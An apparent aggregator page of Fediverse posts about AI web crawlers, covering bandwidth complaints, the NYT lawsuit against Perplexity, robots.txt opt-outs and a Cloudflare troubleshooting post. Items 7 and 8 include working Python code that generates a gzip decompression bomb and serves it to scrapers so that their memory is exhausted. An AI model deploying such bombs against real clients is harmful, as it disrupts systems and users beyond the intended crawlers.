home.social

#crawlers — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #crawlers, aggregated by home.social.

  1. Fucking #crawlers of #meta #facebook #apple #google are eating bandwidth and creating nonsense. In the last 3 days meta developer crawlers alone ate up 850GB+ #bandwidth. Assholes.

  2. 🤖 The Confederation of Open Access Repositories (COAR) has just announced the new Dealing with AI Bots website (dealing-with-bots.coar-reposit) that provides a wealth of information on bots and #crawlers impacting the services and operations of open #repositories, including mitigation strategies; see:
    coar-repositories.org/news-upd

  3. #scrapers and #crawlers are waging a constant #DDOS on our site and driving up cloud hosting costs. We’re coping, but if it keeps getting worse, will OHM last? 🫠

  4. The New York Times sues Perplexity for producing ‘verbatim’ copies of its work – The Verge

    Credit: NYT Times, gettyimages-2249036304

    The New York Times sues Perplexity for producing ‘verbatim’ copies of its work

    The NYT alleges Perplexity ‘unlawfully crawls, scrapes, copies, and distributes’ work from its website.

    by Emma Roth, Dec 5, 2025, 7:42 AM PST. Emma Roth is a news writer who covers the streaming wars, consumer tech, crypto, social media, and much more. Previously, she was a writer and editor at MUO.

    The New York Times has escalated its legal battle against the AI startup Perplexity, as it’s now suing the AI “answer engine” for allegedly producing and profiting from responses that are “verbatim or substantially similar copies” of the publication’s work.

    The lawsuit, filed in a New York federal court on Friday, claims Perplexity “unlawfully crawls, scrapes, copies, and distributes” content from the NYT. It comes after the outlet’s repeated demands for Perplexity to stop using content from its website, as the NYT sent cease-and-desist notices to the AI startup last year and most recently in July, according to the lawsuit. The Chicago Tribune also filed a copyright lawsuit against Perplexity on Thursday.

    The New York Times sued OpenAI for copyright infringement in December 2023, and later inked a deal with Amazon, bringing its content to products like Alexa.

    Perplexity became the subject of several lawsuits after reporting from Forbes and Wired revealed that the startup had been skirting websites’ paywalls to provide AI-generated summaries — and in some cases, copies — of their work. The NYT makes similar accusations in its lawsuit, stating that Perplexity’s crawlers “have intentionally ignored or evaded technical content protection measures,” such as the robots.txt file, which indicates the parts of a website crawlers can access.

    Perplexity attempted to smooth things over by launching a program to share ad revenue with publishers last year, which it later expanded to include its Comet web browser in August.

    Related

    “By copying The Times’s copyrighted content and creating substitutive output derived from its works, obviating the need for users to visit The Times’s website or purchase its newspaper, Perplexity is misappropriating substantial subscription, advertising, licensing, and affiliate revenue opportunities that belong rightfully and exclusively to The Times,” the lawsuit states.

    Continue/Read Original Article Here: The New York Times sues Perplexity for producing ‘verbatim’ copies of its work | The Verge

    Tags: AI, artificial intelligence, Copyright, Crawlers, Distribution, Lawsuit, NYT Work, OpenAI, Perplexity, Robots.txt, Scrapping, Sues, The New York Times, The Verge, Verbatim Copies

    #AI #artificialIntelligence #Copyright #Crawlers #Distribution #Lawsuit #NYTWork #OpenAI #Perplexity #RobotsTxt #Scrapping #Sues #TheNewYorkTimes #TheVerge #VerbatimCopies

  5. 🤖🎉 Wow, #AI #crawlers are now the Indiana Jones of #Codeberg, fearlessly solving #Anubis #challenges while we mere mortals fumble with #JavaScript on Mastodon. 🙄 Clearly, the robots are one step closer to world domination, and we're still struggling to open our native apps. 📱💥
    social.anoxinon.de/@Codeberg/1 #WorldDomination #HackerNews #ngated

  6. I've been getting a lot of weird "domain as a URL" requests for flyriver.com. Decided to look it up and… I'm confused.

    Their site says "Is your site being used by AI Generators?" but then it also says "Or, generate an exact article based on your query:"

    The former seems like an "is your content getting ripped off?" question, but then the second bit is "hey, want to rip off other people's content?" 🧐

    #GenAI #Crawlers #FOAD

  7. A valid zip bomb

    The initial problem is the aggressiveness of web crawlers that don't respect "robots.txt". The first idea that comes to mind is IP blocking. However, web crawlers have circumvented this restriction by using individual IPs via specialized services.

    Another solution is therefore to exhaust the resources of the harvesters. With a zip bomb, we attempt to saturate their memory.

    💭 ache.one/notes/html_zip_bomb
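
    For reference, a minimal sketch of the idea in the linked note, assuming gzip compression; the file name, chunk size, and total size are illustrative choices, not anything from the note itself. A few megabytes on disk can inflate to roughly a gigabyte in whatever client decompresses it.

      # Minimal sketch: write a small gzip file that inflates to a very large,
      # HTML-shaped payload. Sizes and file name are illustrative assumptions.
      import gzip

      OUT = "bomb.html.gz"
      CHUNK = b"<!-- padding -->" * 4096   # 64 KiB of highly compressible data
      ROUNDS = 16 * 1024                   # 64 KiB * 16384 = 1 GiB uncompressed

      with gzip.open(OUT, "wb", compresslevel=9) as f:
          f.write(b"<html><body>")
          for _ in range(ROUNDS):
              f.write(CHUNK)
          f.write(b"</body></html>")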

  8. Hey does anyone know if there's still a working zip bomb style exploit that can be deployed on a static site/JS (or as an asset/resource)? Specifically to target web scrapers and AI bullshit? The second any server goes online now it's immediately bombarded by stupid numbers of requests.

    #hacking #aislop #crawlers #webscraping #webcrawler #robots #zipbomb #zipbombing #exploit #robotstxt #server #scraper
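
    One commonly described approach, sketched below purely as an illustration: serve a pre-compressed file (such as the one generated in the previous item) with a Content-Encoding: gzip header, so a client that honors the header inflates it in memory. A purely static host usually cannot set that header for you, so some server-side piece like this is needed; the path and port are assumptions.

      # Minimal sketch: serve a pre-compressed gzip bomb as ordinary HTML and
      # let the client decompress it. Path and port are illustrative assumptions.
      from http.server import BaseHTTPRequestHandler, HTTPServer

      BOMB_PATH = "bomb.html.gz"  # assumed to exist already

      class BombHandler(BaseHTTPRequestHandler):
          def do_GET(self):
              with open(BOMB_PATH, "rb") as f:
                  payload = f.read()
              self.send_response(200)
              self.send_header("Content-Type", "text/html")
              self.send_header("Content-Encoding", "gzip")
              self.send_header("Content-Length", str(len(payload)))
              self.end_headers()
              self.wfile.write(payload)

      if __name__ == "__main__":
          HTTPServer(("0.0.0.0", 8080), BombHandler).serve_forever()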

  9. It looks like LLM-producing companies that are massively #crawling the #web require the owners of a website to take action to opt out. While I am not intrinsically against #generativeai and the acquisition of #opendata, reading about hundreds of dollars of rising #cloud costs for hobby projects is quite concerning. How is it acceptable that hypergiants skyrocket the costs of tightly budgeted projects through massive spikes in egress traffic and increased processing requirements? Projects that run on a shoestring budget and are operated by volunteers who dedicate hundreds of hours without any reward other than believing in their mission?

    I am mostly concerned about the default of opting out. Are the owners of those projects really required to take action? Seriously? As an #operator, is it my responsibility to methodically work my way through the crawling documentation of hundreds of #LLM #web #crawlers? Am I the one responsible for maintaining a unique crawling specification in my robots.txt because hypergiants make it immensely hard to have generic #opt-out configurations that target LLM projects specifically?

    I refuse to accept that this is our new norm: a norm in which hypergiants not only methodically exploit the work of thousands of individuals for their own benefit without returning a penny, but also one in which the resource owner is required to prevent these crawlers from skyrocketing their own operational costs.

    We require a new #opt-in. Often, public and open projects are keen to share their data. They just don't like the idea of carrying the unpredictable, multitudinous financial burden that said crawlers impose without notice. Even #CommonCrawl has fail-safe mechanisms to reduce the burden on website owners. Why are LLM crawlers above the guidelines of good #Internet citizenship?

    To counter the most common argument already: yes, you can deny-by-default in your robots.txt, but that excludes any non-mainstream crawler, too.
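
    For reference, a per-crawler opt-out along these lines currently looks something like the sketch below. GPTBot (OpenAI), CCBot (Common Crawl), and Google-Extended (Google's AI-training opt-out token) are user-agent tokens the respective vendors document; the list is illustrative rather than complete, and it has to be kept up to date by hand.

      User-agent: GPTBot
      Disallow: /

      User-agent: CCBot
      Disallow: /

      User-agent: Google-Extended
      Disallow: /

      User-agent: *
      Disallow:

    The empty Disallow in the final group leaves every other crawler unaffected, which is exactly the maintenance burden described above.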

    Some concerning #news articles on the topic:

    #webcrawling #crawler #web #opensource

  10. If you have established websites and wish to hide them from search engines such as Google and other crawlers, place a text file named robots.txt with the following content in the root directory of your website:

    User-agent: *
    Disallow: /

    The first line targets all crawlers, and the second line disallows every path under the root directory.

    It is convenient because only two lines are needed to reject all crawlers, but putting this in place shuts out every crawler, which may harm search indexing and other aspects of the site. If there are adverse effects, you can narrow down which crawlers to reject and define them individually, as in the example below.
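
    A minimal illustration of that narrowing (the crawler name is just a placeholder): reject one specific crawler and leave everything else crawlable.

      User-agent: ExampleBot
      Disallow: /

      User-agent: *
      Disallow: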

    WordPress robots.txt can be edited safely using the following plug-ins without placing the text file directly in the root directory:

    By the way, there is something I have been wanting to get working for a while, so I will write about it here.

    I am talking about Cloudflare Tunnel, a revolutionary mechanism that lets you securely expose servers sitting behind your router rather than in the DMZ, and Cloudflare One/Cloudflare WARP, the combination of a gateway for securely accessing that content on the go and a WireGuard-based client with MDM capabilities to connect to it.

    For a long time, I have wanted to run Cloudflare Tunnel and Cloudflare WARP on the same server simultaneously, but that has been challenging to achieve. Sometimes the Tunnel goes into a degraded state, or the server becomes unreachable even when the Tunnel port is open.

    I did a Google search and found the following exchange on a thread in the Cloudflare Community:

    I have ‘degraded status’ when using WARP with Zero Trust

    “Just open the specified port,” the Cloudflare staff responded, but that didn’t work for me.

    Now, I asked ChatGPT about it.

    Using Cloudflare Tunnel and Cloudflare WARP on the same server can indeed be a bit challenging due to potential conflicts in network configurations and routing. However, it’s not impossible to set them up together. Here are some tips and considerations to help you achieve this:

    1. Port Conflicts:
      • Make sure that the ports used by Cloudflare Tunnel and Cloudflare WARP do not conflict. Check the default ports used by each service and configure them accordingly. You might need to adjust the settings for one of the services to use a different set of ports.
    2. Routing Issues:
      • Ensure that there are no conflicting routing rules between the two services. This can be particularly tricky because both services might try to manipulate the server’s network stack. Carefully review the routing tables to avoid conflicts.
    3. Firewall Settings:
      • Check your server’s firewall settings to ensure that it allows traffic for both Cloudflare Tunnel and Cloudflare WARP. If you are using iptables or another firewall tool, make sure that the necessary ports are open and traffic is allowed.
    4. Concurrency and Resources:
      • Consider the resource requirements of both services. Running both services simultaneously may consume a significant amount of system resources (CPU, memory, etc.). Ensure that your server has enough resources to handle the load. You can monitor resource usage using tools like top or htop.
    5. Logging and Debugging:
      • Enable logging for both Cloudflare Tunnel and Cloudflare WARP. Examine the logs for any error messages or warnings that might indicate conflicts or issues. This can help you pinpoint the source of the problem.
    6. Configuration Order:
      • Try starting the services in a specific order. For example, start one service first and ensure it’s working correctly before starting the second one. The order in which services are initialized can sometimes affect their behavior.
    7. Documentation and Support:
      • Refer to the official documentation of both Cloudflare Tunnel and Cloudflare WARP. Check if there are any specific guidelines or recommendations for running them together. Additionally, check the support forums or communities for both services to see if others have encountered similar issues.
    8. Separate Instances:
      • As a last resort, you might consider running Cloudflare Tunnel and Cloudflare WARP on separate instances or virtual machines. This ensures complete isolation and avoids potential conflicts.

    Remember to make backups or snapshots of your server before making significant changes, and proceed with caution, especially if the server is in a production environment. If the issues persist, reaching out to Cloudflare support may provide additional assistance tailored to your specific setup.

    If you ask a professional engineer, you will get this answer. But it’s the answer for someone who has never touched Cloudflare.
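
    As a concrete first step for the port-conflict item in that answer, a small sketch; it assumes the psutil package is installed (pip install psutil), assumes the daemons are named cloudflared and warp-svc, and on Linux it generally needs root to see sockets owned by other users.

      # Minimal sketch: list the sockets held by cloudflared and warp-svc so
      # that overlapping local ports stand out. Process names are assumptions.
      import psutil

      TARGETS = {"cloudflared", "warp-svc"}

      for conn in psutil.net_connections(kind="inet"):
          if conn.pid is None or not conn.laddr:
              continue
          try:
              name = psutil.Process(conn.pid).name()
          except psutil.NoSuchProcess:
              continue
          if name in TARGETS:
              remote = f"{conn.raddr.ip}:{conn.raddr.port}" if conn.raddr else "-"
              print(f"{name} pid={conn.pid} {conn.status} "
                    f"local={conn.laddr.ip}:{conn.laddr.port} remote={remote}")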

    Does anyone know a countermeasure for this “degraded” status?

    https://kotaromiyasaka.com/search-engine-rejection-by-robots-txt-and-cloudflare-tunnel-failure/

    #chatgpt #cloudflare #crawlers #degraded #disallow #firefish #google #mdm #one #plugin #robotsTxt #server #tunnel #warp #wireguard #wordpress #wprobotstxt #zerotrust